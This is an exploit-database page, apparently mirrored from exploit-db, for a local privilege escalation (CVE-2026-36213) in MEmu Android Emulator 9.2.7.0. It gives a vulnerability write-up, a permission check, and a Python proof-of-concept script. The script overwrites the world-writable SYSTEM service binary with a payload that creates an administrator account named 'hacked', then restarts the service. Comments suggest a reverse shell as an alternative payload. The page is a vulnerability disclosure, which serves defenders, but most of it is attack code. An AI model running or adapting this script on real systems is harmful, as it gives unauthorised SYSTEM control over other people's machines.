Lucene search
K

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation

🗓️ 06 Jul 2026 00:00:00Reported by MohammadType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

MEmu Emulator 9.2.7.0 local privilege escalation via MemuService.exe permissions enabling SYSTEM

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2026-36213
11 Jun 202615:00
circl
CVE
CVE-2026-36213
15 Jun 202600:00
cve
Cvelist
CVE-2026-36213
15 Jun 202600:00
cvelist
EUVD
EUVD-2026-36745
15 Jun 202621:30
euvd
NVD
CVE-2026-36213
15 Jun 202620:16
nvd
Packet Storm
📄 MEmu Android Emulator 9.2.7.0 Privilege Escalation
11 Jun 202600:00
packetstorm
Positive Technologies
PT-2026-49285
15 Jun 202600:00
ptsecurity
Vulnrichment
CVE-2026-36213
15 Jun 202600:00
vulnrichment
# Exploit Title: MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation 
# Google Dork: N/A
# Date: 2026-06-16
# Exploit Author: Mohammad
# Vendor Homepage: https://www.memuplay.com
# Software Link: https://www.memuplay.com/download.html
# Version: 9.2.7.0
# Tested on: Windows 10 x64 / Windows 11 x64
# CVE: CVE-2026-36213

###############################################
# Vulnerability Description
###############################################
#
# MEmu Android Emulator 9.2.7.0 installs a Windows
# service named "MEmuSVC" that runs with
# NT AUTHORITY\SYSTEM (LocalSystem) privileges.
#
# The service binary located at:
#   C:\Program Files\Microvirt\MEmu\MemuService.exe
#
# is installed with insecure NTFS permissions,
# granting FullControl (F) to low-privileged groups:
#   - BUILTIN\Users
#   - Everyone
#
# A low-privileged local user can replace the service
# binary with a malicious executable.
# Upon service restart, the malicious binary executes
# with NT AUTHORITY\SYSTEM privileges.
#
# Vulnerability Type : Incorrect Access Control
# CWE                : CWE-732 (Incorrect Permission 
#                      Assignment for Critical Resource)
# CVSS v3.1 Score    : 7.8 HIGH
# CVSS Vector        : AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
#
###############################################
# Verification - Check Permissions
###############################################
#
# Run the following command to verify vulnerability:
#
#   icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
#
# Vulnerable output:
#   C:\Program Files\Microvirt\MEmu\MemuService.exe
#   BUILTIN\Users:(F)
#   Everyone:(F)
#   NT AUTHORITY\SYSTEM:(F)
#   BUILTIN\Administrators:(F)
#
###############################################
# Proof of Concept
###############################################

import os
import sys
import shutil
import subprocess
import ctypes

# -----------------------------------------------
# Step 1: Check if running as low-privileged user
# -----------------------------------------------
def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

# -----------------------------------------------
# Step 2: Verify vulnerable permissions on binary
# -----------------------------------------------
def check_permissions(target_path):
    print("[*] Checking permissions on service binary...")
    print(f"[*] Target: {target_path}\n")
    
    result = subprocess.run(
        ["icacls", target_path],
        capture_output=True,
        text=True
    )
    
    output = result.stdout
    print(output)
    
    # Check for vulnerable permissions
    vulnerable = False
    dangerous_groups = ["BUILTIN\\Users", "Everyone"]
    
    for group in dangerous_groups:
        if group in output and "(F)" in output:
            print(f"[!] VULNERABLE: {group} has FullControl (F)")
            vulnerable = True
    
    return vulnerable

# -----------------------------------------------
# Step 3: Create malicious payload
#         (در محیط واقعی اینجا payload قرار میگیره)
# -----------------------------------------------
def create_payload(payload_path):
    print("\n[*] Creating malicious payload...")
    
    # این یه نمونه ساده‌ست
    # در محیط واقعی اینجا کد مخرب قرار میگیره
    # مثلاً reverse shell یا user creation
    payload_code = '''
import os
# Example: Add new admin user
os.system("net user hacked Password123! /add")
os.system("net localgroup administrators hacked /add")
print("[+] Payload executed as NT AUTHORITY\\SYSTEM")
'''
    
    # کامپایل یا آماده‌سازی payload
    with open(payload_path, "w") as f:
        f.write(payload_code)
    
    print(f"[+] Payload created at: {payload_path}")

# -----------------------------------------------
# Step 4: Replace legitimate binary with payload
# -----------------------------------------------
def replace_binary(target_path, payload_path):
    print("\n[*] Replacing service binary...")
    
    # Backup original binary
    backup_path = target_path + ".bak"
    
    try:
        shutil.copy2(target_path, backup_path)
        print(f"[+] Original backed up to: {backup_path}")
        
        shutil.copy2(payload_path, target_path)
        print(f"[+] Binary replaced successfully!")
        return True
        
    except PermissionError:
        print("[-] Permission denied - Not vulnerable")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

# -----------------------------------------------
# Step 5: Restart service to trigger execution
# -----------------------------------------------
def restart_service(service_name):
    print(f"\n[*] Restarting service: {service_name}")
    
    try:
        subprocess.run(
            ["sc", "stop", service_name],
            capture_output=True
        )
        print(f"[+] Service stopped")
        
        import time
        time.sleep(2)
        
        subprocess.run(
            ["sc", "start", service_name],
            capture_output=True
        )
        print(f"[+] Service started")
        print(f"[+] Payload should now execute as SYSTEM!")
        return True
        
    except Exception as e:
        print(f"[-] Error restarting service: {e}")
        return False

# -----------------------------------------------
# Main Exploit Flow
# -----------------------------------------------
def main():
    print("=" * 55)
    print(" CVE-2026-36213 - MEmu LPE PoC")
    print(" MEmu Android Emulator 9.2.7.0")
    print(" Researcher: Mohammad")
    print("=" * 55)
    
    # Config
    TARGET_SERVICE = "MEmuSVC"
    TARGET_BINARY  = (
        r"C:\Program Files\Microvirt\MEmu\MemuService.exe"
    )
    PAYLOAD_PATH   = r"C:\Temp\payload.exe"
    
    # Check not running as admin
    if is_admin():
        print("[!] Run this as a LOW-PRIVILEGED user!")
        print("[!] This PoC demonstrates LPE")
        sys.exit(1)
    
    print(f"[*] Running as: {os.getenv('USERNAME')}")
    print(f"[*] Admin    : {is_admin()} (should be False)\n")
    
    # Step 1: Verify vulnerability
    if not check_permissions(TARGET_BINARY):
        print("\n[-] Target does not appear vulnerable")
        print("[-] Permissions may have been fixed")
        sys.exit(0)
    
    print("\n[+] Target is VULNERABLE!")
    
    # Step 2: Create payload
    create_payload(PAYLOAD_PATH)
    
    # Step 3: Replace binary
    if not replace_binary(TARGET_BINARY, PAYLOAD_PATH):
        print("\n[-] Exploit failed at binary replacement")
        sys.exit(1)
    
    # Step 4: Trigger execution
    restart_service(TARGET_SERVICE)
    
    print("\n[+] Exploit completed!")
    print("[+] Check if payload executed successfully")
    print("=" * 55)

if __name__ == "__main__":
    main()

###############################################
# Detection Script
###############################################
#
# Automated detection tool available at:
# https://github.com/sec-zone/Hijack-service-binaries
#
###############################################
# Disclosure Timeline
###############################################
#
# 2026-02-20 → Vulnerability discovered
# 2026-02-20 → CVE-2026-36213 assigned by MITRE
# 2026-06-11 → Vendor (Microvirt) notified
# 2026-06-16 → Public disclosure
#
###############################################
# References
###############################################
#
# [1] CWE-732: Incorrect Permission Assignment
#     https://cwe.mitre.org/data/definitions/732.html
#
# [2] CVE-2026-36213
#     https://www.cve.org/CVERecord?id=CVE-2026-36213
#
# [3] Detection Script
#     https://github.com/sec-zone/Hijack-service-binaries
#
###############################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation